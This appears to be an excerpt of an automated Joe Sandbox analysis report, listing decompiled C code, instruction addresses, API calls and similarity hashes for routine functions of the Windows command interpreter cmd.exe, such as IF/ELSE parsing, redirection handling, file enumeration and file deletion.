0x00000000
0x00da3e62
0x00da3e35
0x00da3e38
0x00da3e44
0x00da3e48
0x00da3e4b
0x00da3e50
0x00000000
0x00000000
0x00000000
0x00da3e52
0x00da3e54
0x00da3e56
0x00000000
0x00da3e56
0x00da3d62
0x00da3d62
0x00da3d64
0x00da3d64
0x00da3d67
0x00da3d67
0x00da3d6a
0x00da3d6d
0x00da3d74
0x00da3d7c
0x00da3f94
0x00da3f96
0x00da3fa1
0x00da3fa2
0x00da3fa7
0x00da3faa
0x00da3faa
0x00da3faf
0x00da3fbf
0x00da3fbf
0x00da3d8e
0x00da3e78
0x00da3e84
0x00da3e89
0x00da3e8e
0x00da3e97
0x00da3e9d
0x00da3ea0
0x00da3ea3
0x00000000
0x00000000
0x00000000
0x00da3ea3
0x00da3eb0
0x00da3eb2
0x00da3eb6
0x00da3efe
0x00da3f00
0x00da3f0e
0x00da3f14
0x00da3fd0
0x00da3fd0
0x00000000
0x00da3fd0
0x00da3f21
0x00da3f2a
0x00da3f2c
0x00da3f32
0x00da3f35
0x00da3f3e
0x00da3f37
0x00da3f37
0x00da3f37
0x00da3f45
0x00da3f72
0x00da3f76
0x00da3f78
0x00da3f82
0x00da3f83
0x00da3f88
0x00da3f8b
0x00000000
0x00da3f47
0x00da3f4e
0x00da3f63
0x00000000
0x00000000
0x00da3f70
0x00da3fc0
0x00da3fc8
0x00da3fc9
0x00000000
0x00da3fc9
0x00000000
0x00da3f70
0x00da3f45
0x00da3ec0
0x00da3ec3
0x00da3ec5
0x00da3ef6
0x00da3ef6
0x00da3ef9
0x00da3efb
0x00000000
0x00da3efb
0x00da3ecc
0x00da3ed1
0x00da3ed7
0x00da3edb
0x00da3ee2
0x00000000
0x00000000
0x00da3ee4
0x00da3ee7
0x00da3ee8
0x00da3eeb
0x00da3eee
0x00000000
0x00000000
0x00000000
0x00da3ef0
0x00da3ef4
0x00000000
0x00000000
0x00000000
0x00da3ef4
0x00da3d5a
0x00da3d58
0x00da3d19
0x00000000
0x00000000
0x00000000
0x00da3d19

APIs

_get_osfhandle.MSVCRT ref: 00DA3DED
GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 00DA3F21
SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 00DA3F4E
SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 00DA3F5B
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 00DA3F65
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 00DA3FC2

Strings

/-., xrefs: 00DA3CEA
%s, xrefs: 00DA3E6B
:, xrefs: 00DA3D48

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: LocalTime$ErrorLast$_get_osfhandle
String ID: %s$/-.$:
API String ID: 1033501010-879152773
Opcode ID: e4844d090832dad0fb567d3bfd933d01a2f5f8ba3e951addca181fb3cc92061f
Instruction ID: 7edeb4abaf021d93451a4d09249c4604f78163fbd1e2da4ffec31265533f771f
Opcode Fuzzy Hash: e4844d090832dad0fb567d3bfd933d01a2f5f8ba3e951addca181fb3cc92061f
Instruction Fuzzy Hash: 30813831A002568BDF24AB64CC4ABFA73A6EF82300F184665F806E7694EB75DF45C770

Uniqueness

Uniqueness Score: -1.00%

Function 00D8D803, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212
COMMONCrypto

Download Yara Rule

C-Code - Quality: 62%

			E00D8D803(void* __eax, WCHAR* __ebx, void* __ecx) {
				void* __edi;
				void* __esi;
				short _t56;
				short _t57;
				signed int _t59;
				intOrPtr* _t62;
				intOrPtr _t63;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				signed int _t76;
				void* _t81;
				signed int _t85;
				signed int _t86;
				WCHAR* _t90;
				signed int _t91;
				void* _t92;
				WCHAR* _t93;
				signed int _t100;
				WCHAR* _t104;
				void* _t105;
				void* _t110;
				void* _t114;
				signed int _t118;
				signed int _t125;
				WCHAR* _t132;
				void* _t138;
				signed int _t140;
				void* _t144;
				void* _t150;
				void* _t156;
				WCHAR* _t157;
				void* _t160;
				signed int _t162;
				signed int _t165;
				signed int _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				signed int _t171;
				signed int _t173;
				void* _t174;
				signed int _t175;
				signed int _t177;
				signed int _t180;

				_t104 = __ebx;
				_t157 = 0;
				__imp___wcsicmp(L"IF/?", 0xdbfaa0, _t156, _t170, __ecx);
				_t186 = __eax;
				if(__eax == 0) {
					 *0xdbfaa4 = 0;
					_t157 = 1;
				}
				_t110 = 0x2c;
				_t171 = E00D8E9A0(_t110, _t186);
				if(_t157 != 0) {
					_t56 = 0x2f;
					 *0xdbfaa0 = _t56;
					_t57 = 0x3f;
					 *0xdbfaa2 = _t57;
					 *0xdbfaa4 = 0;
				} else {
					E00D8F030(0);
				}
				_t149 = 0x2c;
				_t59 = E00D8DCE1(_t104, _t149, _t157);
				if(_t59 != 0) {
					 *(_t171 + 0x38) =  *(_t171 + 0x38) & 0x00000000;
					 *_t171 = 0x3c;
					goto L13;
				} else {
					_t160 = 0;
					if( *0xdc3cc9 == _t59) {
						L6:
						_t149 = 0;
						E00D8F300(_t59, 0, 0, 0);
					} else {
						__imp___wcsicmp(0xdbfaa0, L"/I");
						if(_t59 == 0) {
							_t160 = 1;
						} else {
							goto L6;
						}
					}
					_t62 = E00D8CDA2(0);
					 *((intOrPtr*)(_t171 + 0x3c)) = _t62;
					if(_t62 != 0 && _t160 != 0) {
						__eflags =  *_t62 - 0x38;
						if( *_t62 == 0x38) {
							_t62 =  *((intOrPtr*)(_t62 + 0x3c));
						}
						 *((intOrPtr*)(_t62 + 0x40)) = 2;
					}
					_t114 = 0x2c;
					_t63 = E00D8DC74(_t104, _t114);
					 *((intOrPtr*)(_t171 + 0x40)) = _t63;
					if(_t63 == 0) {
						E00DA82EB(_t114);
					}
					if(E00D8EEC8() == 0) {
						L13:
						return _t171;
					} else {
						_t66 = E00D8F030(0);
						__imp___wcsicmp(L"ELSE", 0xdbfaa0);
						if(_t66 == 0) {
							_t118 =  *0xdbfa8c +  *0xdbfa8c;
							_t68 = E00D900B0(_t118);
							__eflags = _t68;
							if(_t68 == 0) {
								E00DA9287(_t118);
								__imp__longjmp(0xdbb8b8, 1);
								asm("int3");
								while(1) {
									L58:
									 *((short*)(_t149 + _t118 * 2)) = 0;
									while(1) {
										_t71 =  *(_t171 + 0x14);
										_t171 = _t71;
										__eflags = _t71;
										if(_t71 == 0) {
											break;
										}
										_t119 =  *(_t171 + 4);
										_t162 =  *(_t171 + 4);
										_t150 = _t162 + 2;
										do {
											_t72 =  *_t162;
											_t162 = _t162 + 2;
											__eflags = _t72 - _t104;
										} while (_t72 != _t104);
										_t73 = E00D922C0(_t104, _t119);
										_t149 = (_t162 - _t150 >> 1) + 1;
										E00D91040( *(_t171 + 4), (_t162 - _t150 >> 1) + 1, _t73);
										__eflags =  *((intOrPtr*)(_t171 + 8)) - _t104;
										if( *((intOrPtr*)(_t171 + 8)) == _t104) {
											_t149 =  *(_t171 + 4);
											_t140 = _t149;
											_t168 = _t140 + 2;
											do {
												_t75 =  *_t140;
												_t140 = _t140 + 2;
												__eflags = _t75 - _t104;
											} while (_t75 != _t104);
											_t118 = (_t140 - _t168 >> 1) - 1;
											__eflags = _t118 - 1;
											if(_t118 > 1) {
												__eflags =  *((short*)(_t149 + _t118 * 2)) - 0x3a;
												if( *((short*)(_t149 + _t118 * 2)) == 0x3a) {
													goto L58;
												}
											}
										}
									}
									_t165 =  *(_t180 - 0x228);
									_t173 =  *(_t180 - 0x224);
									__eflags = _t173 - 3;
									if(_t173 == 3) {
										_t76 =  *0xdc3cd4;
										 *(_t180 - 0x228) = _t76;
										goto L33;
									} else {
										_t138 = 0x10;
										_t76 = E00D900B0(_t138);
										 *(_t180 - 0x228) = _t76;
										__eflags = _t76;
										if(_t76 == 0) {
											L52:
											_t104 = 1;
										} else {
											 *(_t76 + 0xc) =  *0xdc3cd4;
											 *0xdc3cd4 = _t76;
											 *(_t76 + 8) = _t165;
											 *_t76 = _t173;
											L33:
											_t166 =  *(_t165 + 0x34);
											__eflags = _t166;
											if(_t166 != 0) {
												_t175 = _t173 | 0xffffffff;
												__eflags = _t175;
												do {
													__eflags =  *(_t166 + 8) - _t104;
													if( *(_t166 + 8) != _t104) {
														goto L48;
													} else {
														__imp___get_osfhandle( *_t166);
														__eflags = _t76 - _t175;
														if(_t76 == _t175) {
															L63:
															 *(_t166 + 8) = _t175;
															goto L41;
														} else {
															__imp___get_osfhandle( *_t166);
															__eflags = _t76 - 0xfffffffe;
															if(_t76 == 0xfffffffe) {
																goto L63;
															} else {
																_t92 = E00D90178(_t76);
																__eflags = _t92;
																if(_t92 == 0) {
																	_t92 = E00DA9953(_t92,  *_t166);
																	__eflags = _t92;
																	if(_t92 != 0) {
																		goto L39;
																	} else {
																		__imp___get_osfhandle( *_t166, _t104, _t104, 1);
																		_pop(_t136);
																		_t92 = SetFilePointer(_t92, ??, ??, ??);
																		__eflags = _t92 - _t175;
																		if(_t92 != _t175) {
																			goto L39;
																		} else {
																			E00D9274C(0xdc3d00, 0x104, L"%d",  *_t166);
																			_push(0xdc3d00);
																			_push(1);
																			_push(0x40002721);
																			goto L75;
																		}
																	}
																} else {
																	L39:
																	_t136 =  *_t166;
																	_t93 = E00D8DBCE(_t92,  *_t166);
																	 *(_t166 + 8) = _t93;
																	__eflags = _t93 - _t175;
																	if(_t93 == _t175) {
																		E00D9274C(0xdc3d00, 0x104, L"%d",  *_t166);
																		_push(0xdc3d00);
																		_push(1);
																		_push(0x2344);
																		L75:
																		E00D8C5A2(_t136);
																		 *(_t166 + 8) = _t104;
																		E00D8D937();
																		goto L52;
																	} else {
																		E00D8DB92( *_t166);
																		L41:
																		_t125 =  *(_t166 + 4);
																		__eflags =  *_t125 - 0x26;
																		if( *_t125 == 0x26) {
																			 *((short*)(_t125 + 4)) = 0;
																			_t149 =  *_t166;
																			_t127 = (( *(_t166 + 4))[1] & 0x0000ffff) - 0x30;
																			_t81 = E00D8DBFC((( *(_t166 + 4))[1] & 0x0000ffff) - 0x30,  *_t166);
																			__eflags = _t81 - _t175;
																			if(_t81 != _t175) {
																				goto L48;
																			} else {
																				goto L76;
																			}
																		} else {
																			__eflags =  *((short*)(_t166 + 0x10)) - 0x3c;
																			_push(_t125);
																			if( *((short*)(_t166 + 0x10)) == 0x3c) {
																				_t149 = 0x8000;
																				_t85 = E00D8D120(_t125, 0x8000);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 != _t175) {
																					goto L45;
																				} else {
																					_t90 = E00D93320(L"DPATH");
																					__eflags = _t90;
																					if(_t90 == 0) {
																						goto L77;
																					} else {
																						_t132 =  *(_t180 - 0x18);
																						__eflags = _t132;
																						if(_t132 == 0) {
																							_t132 = _t180 - 0x220;
																						}
																						_t91 = SearchPathW(_t90,  *(_t166 + 4), _t104,  *(_t180 - 0x10), _t132, _t104);
																						__eflags = _t91;
																						if(_t91 == 0) {
																							goto L77;
																						} else {
																							_t125 =  *(_t180 - 0x18);
																							__eflags = _t125;
																							if(_t125 == 0) {
																								_t125 = _t180 - 0x220;
																							}
																							_push(_t125);
																							_t149 = 0x8000;
																							goto L44;
																						}
																					}
																				}
																			} else {
																				asm("sbb edx, edx");
																				_t149 = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				__eflags = ( ~( *(_t166 + 0xc)) & 0xfffffe09) + 0x301;
																				L44:
																				_t85 = E00D8D120(_t125, _t149);
																				 *(_t180 - 0x224) = _t85;
																				__eflags = _t85 - _t175;
																				if(_t85 == _t175) {
																					L77:
																					E00D8D937();
																					E00DA985A( *0xdc3cf0);
																					goto L52;
																				} else {
																					L45:
																					__eflags = _t85 -  *_t166;
																					if(_t85 !=  *_t166) {
																						_t149 =  *_t166;
																						_t86 = E00D8DBFC(_t85,  *_t166);
																						_t127 =  *(_t180 - 0x224);
																						_t177 = _t86;
																						E00D8DB92( *(_t180 - 0x224));
																						__eflags = _t177 - 0xffffffff;
																						if(_t177 == 0xffffffff) {
																							L76:
																							E00D8D937();
																							E00D9274C(0xdc3d00, 0x104, L"%d",  *_t166);
																							E00D8C5A2(_t127, 0x2344, 1, 0xdc3d00);
																							goto L52;
																						} else {
																							_t85 =  *_t166;
																							_t175 = _t177 | 0xffffffff;
																							goto L46;
																						}
																					} else {
																						L46:
																						__eflags = _t85 - _t175;
																						if(_t85 == _t175) {
																							goto L77;
																						} else {
																							 *( *(_t180 - 0x228) + 4) = _t85;
																							goto L48;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
													goto L49;
													L48:
													_t76 =  *(_t166 + 0x14);
													_t166 = _t76;
													__eflags = _t76;
												} while (_t76 != 0);
											}
										}
									}
									L49:
									__imp__??_V@YAXPAX@Z( *(_t180 - 0x18));
									_pop(_t167);
									_pop(_t174);
									__eflags =  *(_t180 - 4) ^ _t180;
									_pop(_t105);
									return E00D96FD0(_t104, _t105,  *(_t180 - 4) ^ _t180, _t149, _t167, _t174);
									goto L78;
								}
							} else {
								 *(_t171 + 0x44) = _t68;
								E00D91040(_t68,  *0xdbfa8c, 0xdbfaa0);
								_t144 = 0x2c;
								_t100 = E00D8DC74(_t104, _t144);
								 *(_t171 + 0x48) = _t100;
								__eflags = _t100;
								if(_t100 == 0) {
									E00DA82EB(_t144);
								}
								goto L13;
							}
						} else {
							E00D8F300(_t66, 0, 0, 0);
							goto L13;
						}
					}
				}
				L78:
			}

0x00d8d803
0x00d8d812
0x00d8d814
0x00d8d81c
0x00d8d81e
0x00d9b9cf
0x00d9b9d5
0x00d9b9d5
0x00d8d826
0x00d8d82c
0x00d8d830
0x00d9b9dd
0x00d9b9de
0x00d9b9e6
0x00d9b9e7
0x00d9b9ef
0x00d8d836
0x00d8d838
0x00d8d838
0x00d8d83f
0x00d8d840
0x00d8d847
0x00d9b9fa
0x00d9b9fe
0x00000000
0x00d8d84d
0x00d8d84d
0x00d8d855
0x00d8d871
0x00d8d873
0x00d8d877
0x00d8d857
0x00d8d861
0x00d8d86b
0x00d8d91b
0x00000000
0x00000000
0x00000000
0x00d8d86b
0x00d8d87e
0x00d8d883
0x00d8d888
0x00d8d921
0x00d8d924
0x00d8d932
0x00d8d932
0x00d8d926
0x00d8d926
0x00d8d894
0x00d8d895
0x00d8d89a
0x00d8d89f
0x00d9ba09
0x00d9ba09
0x00d8d8ac
0x00d8d8d7
0x00d8d8dc
0x00d8d8ae
0x00d8d8b0
0x00d8d8c0
0x00d8d8ca
0x00d8d8e2
0x00d8d8e5
0x00d8d8ea
0x00d8d8ec
0x00d9ba13
0x00d9ba1f
0x00d9ba25
0x00d9ba26
0x00d9ba26
0x00d9ba28
0x00d8da46
0x00d8da46
0x00d8da49
0x00d8da4b
0x00d8da4d
0x00000000
0x00000000
0x00d8d9f1
0x00d8d9f4
0x00d8d9f6
0x00d8d9f9
0x00d8d9f9
0x00d8d9fc
0x00d8d9ff
0x00d8d9ff
0x00d8da08
0x00d8da10
0x00d8da14
0x00d8da19
0x00d8da1c
0x00d8da1e
0x00d8da21
0x00d8da23
0x00d8da26
0x00d8da26
0x00d8da29
0x00d8da2c
0x00d8da2c
0x00d8da35
0x00d8da36
0x00d8da39
0x00d8da3b
0x00d8da40
0x00000000
0x00000000
0x00d8da40
0x00d8da39
0x00d8da1c
0x00d8da4f
0x00d8da55
0x00d8da5b
0x00d8da5e
0x00d9ba31
0x00d9ba36
0x00000000
0x00d8da64
0x00d8da66
0x00d8da67
0x00d8da6c
0x00d8da72
0x00d8da74
0x00d8db8d
0x00d8db8f
0x00d8da7a
0x00d8da80
0x00d8da83
0x00d8da88
0x00d8da8b
0x00d8da8d
0x00d8da8d
0x00d8da90
0x00d8da92
0x00d8da98
0x00d8da98
0x00d8da9b
0x00d8da9b
0x00d8da9e
0x00000000
0x00d8daa4
0x00d8daa6
0x00d8daad
0x00d8daaf
0x00d9ba90
0x00d9ba90
0x00000000
0x00d8dab5
0x00d8dab7
0x00d8dabe
0x00d8dac1
0x00000000
0x00d8dac7
0x00d8dac9
0x00d8dace
0x00d8dad0
0x00d9ba43
0x00d9ba48
0x00d9ba4a
0x00000000
0x00d9ba50
0x00d9ba56
0x00d9ba5c
0x00d9ba5e
0x00d9ba64
0x00d9ba66
0x00000000
0x00d9ba6c
0x00d9ba7e
0x00d9ba83
0x00d9ba84
0x00d9ba86
0x00000000
0x00d9ba86
0x00d9ba66
0x00d8dad6
0x00d8dad6
0x00d8dad6
0x00d8dad8
0x00d8dadd
0x00d8dae0
0x00d8dae2
0x00d9bb36
0x00d9bb3b
0x00d9bb3c
0x00d9bb3e
0x00d9bb43
0x00d9bb43
0x00d9bb4b
0x00d9bb4e
0x00000000
0x00d8dae8
0x00d8daea
0x00d8daef
0x00d8daef
0x00d8daf2
0x00d8daf6
0x00d8db6f
0x00d8db76
0x00d8db7c
0x00d8db7f
0x00d8db84
0x00d8db86
0x00000000
0x00d8db88
0x00000000
0x00d8db88
0x00d8daf8
0x00d8daf8
0x00d8dafd
0x00d8dafe
0x00d9ba98
0x00d9ba9d
0x00d9baa2
0x00d9baa8
0x00d9baaa
0x00000000
0x00d9bab0
0x00d9bab5
0x00d9baba
0x00d9babc
0x00000000
0x00d9bac2
0x00d9bac2
0x00d9bac5
0x00d9bac7
0x00d9bac9
0x00d9bac9
0x00d9bad9
0x00d9badf
0x00d9bae1
0x00000000
0x00d9bae7
0x00d9bae7
0x00d9baea
0x00d9baec
0x00d9baee
0x00d9baee
0x00d9baf4
0x00d9baf5
0x00000000
0x00d9baf5
0x00d9bae1
0x00d9babc
0x00d8db04
0x00d8db09
0x00d8db11
0x00d8db11
0x00d8db17
0x00d8db17
0x00d8db1c
0x00d8db22
0x00d8db24
0x00d9bb89
0x00d9bb89
0x00d9bb94
0x00000000
0x00d8db2a
0x00d8db2a
0x00d8db2a
0x00d8db2c
0x00d9baff
0x00d9bb03
0x00d9bb08
0x00d9bb0e
0x00d9bb10
0x00d9bb15
0x00d9bb18
0x00d9bb58
0x00d9bb58
0x00d9bb6f
0x00d9bb7c
0x00000000
0x00d9bb1a
0x00d9bb1a
0x00d9bb1c
0x00000000
0x00d9bb1c
0x00d8db32
0x00d8db32
0x00d8db32
0x00d8db34
0x00000000
0x00d8db3a
0x00d8db40
0x00000000
0x00d8db40
0x00d8db34
0x00d8db2c
0x00d8db24
0x00d8dafe
0x00d8daf6
0x00d8dae2
0x00d8dad0
0x00d8dac1
0x00d8daaf
0x00000000
0x00d8db43
0x00d8db43
0x00d8db46
0x00d8db48
0x00d8db48
0x00d8da9b
0x00d8da92
0x00d8da74
0x00d8db50
0x00d8db53
0x00d8db5f
0x00d8db60
0x00d8db61
0x00d8db63
0x00d8db6c
0x00000000
0x00d8db6c
0x00d8d8f2
0x00d8d8fb
0x00d8d8fe
0x00d8d905
0x00d8d906
0x00d8d90b
0x00d8d90e
0x00d8d910
0x00d8d912
0x00d8d912
0x00000000
0x00d8d910
0x00d8d8cc
0x00d8d8d2
0x00000000
0x00d8d8d2
0x00d8d8ca
0x00d8d8ac
0x00000000

APIs

_wcsicmp.MSVCRT ref: 00D8D814
_wcsicmp.MSVCRT ref: 00D8D861
_wcsicmp.MSVCRT ref: 00D8D8C0

Strings

IF/?, xrefs: 00D8D80D
ELSE, xrefs: 00D8D8BB

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: _wcsicmp
String ID: ELSE$IF/?
API String ID: 2081463915-1134991328
Opcode ID: 01886accc126e5630cb41ff09eac1f4b558cd7ed9fa9f032835ae15973294b79
Instruction ID: d530bb7e10f0b7509cebefa0bdb9e2e01a771357361f84f443b6a14be957826b
Opcode Fuzzy Hash: 01886accc126e5630cb41ff09eac1f4b558cd7ed9fa9f032835ae15973294b79
Instruction Fuzzy Hash: D2619231600702DADB28BF35ED55A2AB7B2EF84760B29452AE446D72E1EF71D840CB70

Uniqueness

Uniqueness Score: -1.00%

Function 00D968BA, Relevance: 15.1, APIs: 10, Instructions: 114
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E00D968BA(intOrPtr* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, void** _a16) {
				signed int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t18;
				void* _t22;
				void* _t24;
				int _t28;
				void* _t40;
				void* _t41;
				void* _t47;
				void* _t50;
				void* _t51;
				void** _t53;
				void* _t54;
				signed int _t55;

				_t48 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0xdad0b4; // 0x35c4fbb8
				_v8 = _t18 ^ _t55;
				_v12 = __ecx;
				_t40 = 0;
				_t22 = FindFirstFileExW(__edx, 0 | _a8 == 0x00000000, _a12, 0, 0, 2);
				_t53 = _a16;
				_t50 = _t22;
				 *_t53 = _t50;
				while(_t50 != 0xffffffff) {
					_push(_a4);
					_push(_a12);
					if(_v12 != E00D96A00) {
						 *0xdc94b4();
						_t28 =  *_v12();
						_t50 =  *_t53;
					} else {
						_t28 = E00D96A00();
					}
					if(_t28 == 0) {
						if(FindNextFileW(_t50, _a12) == 0) {
							FindClose( *_t53);
							 *_t53 =  *_t53 | 0xffffffff;
							_t50 = _t50 | 0xffffffff;
							goto L6;
						} else {
							_t50 =  *_t53;
							continue;
						}
					} else {
						 *0xdc3cf0 =  *0xdc3cf0 & 0x00000000;
						_t40 = 1;
						L6:
						if(_t50 == 0xffffffff) {
							L12:
							if(_t40 == 0) {
								break;
							}
							L13:
							_t24 = _t40;
						} else {
							_t47 =  *0xdc3cf4;
							if(_t47 == 0) {
								_t47 = HeapAlloc(GetProcessHeap(), 0, 0x14);
								goto L17;
							} else {
								_t48 =  *0xdad5dc; // 0x0
								if(_t48 >=  *0xdc3cf8) {
									_t47 = HeapReAlloc(GetProcessHeap(), 0, _t47, 4 + _t48 * 4);
									if(_t47 == 0) {
										 *0xdc3cf0 = GetLastError();
										FindClose( *_t53);
										 *_t53 =  *_t53 | 0xffffffff;
										_t24 = 0;
									} else {
										 *0xdc3cf8 =  *0xdc3cf8 + 1;
										L17:
										_t48 =  *0xdad5dc; // 0x0
										 *0xdc3cf4 = _t47;
										goto L9;
									}
								} else {
									L9:
									if(_t47 != 0) {
										 *(_t47 + _t48 * 4) =  *_t53;
										 *0xdad5dc = _t48;
									}
									_t40 = 1;
									goto L12;
								}
							}
						}
					}
					_pop(_t51);
					_pop(_t54);
					_pop(_t41);
					return E00D96FD0(_t24, _t41, _v8 ^ _t55, _t48, _t51, _t54);
				}
				 *0xdc3cf0 = GetLastError();
				goto L13;
			}

0x00d968ba
0x00d968bf
0x00d968c0
0x00d968c1
0x00d968c8
0x00d968d4
0x00d968dc
0x00d968e6
0x00d968ec
0x00d968ef
0x00d968f1
0x00d968f3
0x00d968f8
0x00d968fe
0x00d96906
0x00d9699a
0x00d969a3
0x00d969a5
0x00d9690c
0x00d9690c
0x00d9690c
0x00d96913
0x00d969e2
0x00d969ed
0x00d969f3
0x00d969f6
0x00000000
0x00d969e4
0x00d969e4
0x00000000
0x00d969e4
0x00d96919
0x00d96919
0x00d96920
0x00d96922
0x00d96925
0x00d96951
0x00d96953
0x00000000
0x00000000
0x00d96955
0x00d96955
0x00d96927
0x00d96927
0x00d9692f
0x00d96988
0x00000000
0x00d96931
0x00d96931
0x00d9693d
0x00d969c4
0x00d969c8
0x00da154f
0x00da1554
0x00da155a
0x00da155d
0x00d969ce
0x00d969ce
0x00d9698a
0x00d9698a
0x00d96990
0x00000000
0x00d96990
0x00d9693f
0x00d9693f
0x00d96941
0x00d96945
0x00d96949
0x00d96949
0x00d9694f
0x00000000
0x00d9694f
0x00d9693d
0x00d9692f
0x00d96925
0x00d9695a
0x00d9695b
0x00d9695e
0x00d96967
0x00d96967
0x00d96970
0x00000000

APIs

FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,00D96A00,00D96A00,?,00D8AE4F,00000037,00000000,?), ref: 00D968E6
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00D8AE4F,00000037,00000000,?,?), ref: 00D9696A
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,00D8AE4F,00000037,00000000,?,?), ref: 00D9697B
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8AE4F,00000037,00000000,?,?), ref: 00D96982
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,00D8AE4F,00000037,00000000,?,?), ref: 00D969B7
HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D8AE4F,00000037,00000000,?,?), ref: 00D969BE
FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000037,?,00D8AE4F,00000037,00000000,?,?), ref: 00D969DA
FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00D8AE4F,?,00D8AE4F,00000037,00000000,?,?), ref: 00D969ED

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: Heap$Find$AllocFileProcess$CloseErrorFirstLastNext
String ID:
API String ID: 1047556133-0
Opcode ID: 8ceb6d0188b5d25aeab227c60b430dea70a5a580ac857190c30a3e5698ebe7b3
Instruction ID: 14ba7c3993205bc59f32757e93a2758cf7557b73528687ca652324df13a15cf5
Opcode Fuzzy Hash: 8ceb6d0188b5d25aeab227c60b430dea70a5a580ac857190c30a3e5698ebe7b3
Instruction Fuzzy Hash: 4B416735600307AFCF148F64DD19EA9BBA5EB8A321F284619E992D73A0DB31D901DF70

Uniqueness

Uniqueness Score: -1.00%

Function 00D883F2, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00D883F2(WCHAR* __ecx, signed int __edx) {
				void* _v8;
				void* _v16;
				void* _v24;
				long _v32;
				char _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void* _v64;
				struct _EXCEPTION_RECORD _t30;
				long _t31;
				long _t35;
				WCHAR* _t41;
				char* _t43;
				long _t47;
				void* _t49;

				_t47 = 0;
				_t41 = __ecx;
				if((__edx & 0x00000400) != 0) {
					L11:
					if(DeleteFileW(_t41) == 0) {
						_t47 = GetLastError();
					}
					L8:
					return _t47;
				}
				_v8 = _v8 | 0xffffffff;
				_t30 =  &_v16;
				__imp__RtlDosPathNameToRelativeNtPathName_U_WithStatus(__ecx, _t30, 0,  &_v40);
				if(_t30 < 0) {
					goto L11;
				}
				if(_v40 > 0) {
					_t31 = _v32;
					_t43 =  &_v40;
				} else {
					_t31 = 0;
					_t43 =  &_v16;
					_v32 = 0;
				}
				_v60 = _t31;
				_v64 = 0x18;
				_v52 = 0x40;
				_v56 = _t43;
				_v48 = _t47;
				_v44 = _t47;
				_t35 = NtOpenFile( &_v8, 0x10000,  &_v64,  &_v24, 4, 0x5040);
				__imp__RtlReleaseRelativeName( &_v40);
				RtlFreeUnicodeString( &_v16);
				if(_t35 < 0) {
					goto L11;
				} else {
					if(E00D884BE(_v8) != 0) {
						_t49 = E00DA9AB4(_v8);
					} else {
						_t49 = 1;
					}
					CloseHandle(_v8);
					if(_t49 == 0) {
						goto L11;
					} else {
						goto L8;
					}
				}
			}

0x00d883fd
0x00d883ff
0x00d88407
0x00da036d
0x00da0376
0x00da0382
0x00da0382
0x00d884b5
0x00d884bd
0x00d884bd
0x00d8840d
0x00d88416
0x00d8841b
0x00d88423
0x00000000
0x00000000
0x00d8842d
0x00da0353
0x00da0356
0x00d88433
0x00d88433
0x00d88435
0x00d88438
0x00d88438
0x00d88440
0x00d8844c
0x00d8845c
0x00d88464
0x00d88467
0x00d8846a
0x00d8846d
0x00d88479
0x00d88483
0x00d8848b
0x00000000
0x00d88491
0x00d8849b
0x00da0366
0x00d884a1
0x00d884a3
0x00d884a3
0x00d884a7
0x00d884af
0x00000000
0x00000000
0x00000000
0x00000000
0x00d884af

APIs

RtlDosPathNameToRelativeNtPathName_U_WithStatus.NTDLL ref: 00D8841B
NtOpenFile.NTDLL ref: 00D8846D
RtlReleaseRelativeName.NTDLL ref: 00D88479
RtlFreeUnicodeString.NTDLL(?), ref: 00D88483

Part of subcall function 00D884BE: NtQueryVolumeInformationFile.NTDLL ref: 00D884EA

